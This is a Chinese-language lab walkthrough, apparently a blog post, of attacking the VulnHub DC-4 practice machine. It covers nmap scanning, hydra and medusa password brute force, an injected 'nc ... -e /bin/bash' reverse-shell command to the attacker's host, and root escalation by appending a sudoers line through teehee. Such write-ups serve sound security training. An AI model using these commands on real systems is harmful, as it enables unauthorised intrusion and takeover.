DC-4 靶机渗透测试流程

靶机下载地址

DC: 4 ~ VulnHub

信息收集

主机探测

获取目标靶机IP:10.10.10.16

初步扫描 

sudo nmap -sT --min-rate 10000 -p- 10.10.10.16

就22,80端口

详细信息扫描

sudo nmap -sT -sC -sV -O -p 22,80 10.10.10.16

漏洞脚本扫描 

 sudo nmap -sT --script=vuln -p 22,80 10.10.10.16

无可利用漏洞信息

渗透流程

密码爆破 

访问80端口,没有任何其它信息,并且无限制次数登录,只能爆破了。可使用Burpsuit,也可使用hydra,反正我用的hydra因为burpsuit太卡了。

使用charles ^xHhA&hvim0y成功登录 

抓包修改代码获取反弹SHELL

发现可以执行代码,但是网页源代码里并没有设置执行的代码是什么。

抓包发现命令代码

 

 修改为nc 10.10.10.2 4444 -e /bin/bash,攻击机开启监听,成功获取反弹shell

敏感文件寻找

在/home/jim/backups目录下面发现疑似字典的文件

用python -m SimpleHTTPServer 8000建立服务器,下载字典。

 

 SSH密码破解

查看/etc/passwd查看用户名字典获取三个可登录用户,使用medusa进行密码爆破

sudo medusa -M ssh -h 10.10.10.16 -n 22 -u user -P old-passwords.bak -t 20

成功获取账户名密码User: jim Password: jibril04

SSH登录 

 

寻找邮件

查看当前文件夹下的mail,发现是一封来自root的邮件,内容是this is a test

猜测当前主机存在其它邮件。

用find / -name *mail* 2>/dev/null查看
发现可疑文件jim

 查看内容获取到charles的密码^xHhA&hvim0y

 

权限提升

登录到charles,发现被授予以root的身份执行teehee

 

 

发现该命令可向文件追加内容,类似于echo “your_shit”>>/path/to/your/shit

可使用teehee向/etc/sudoers追加内容

charles    ALL=(ALL:ALL) ALL
含义是:

charles这个用户在所有主机上以任何身份执行任何命令的权限。

 成功提权,获取flag

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值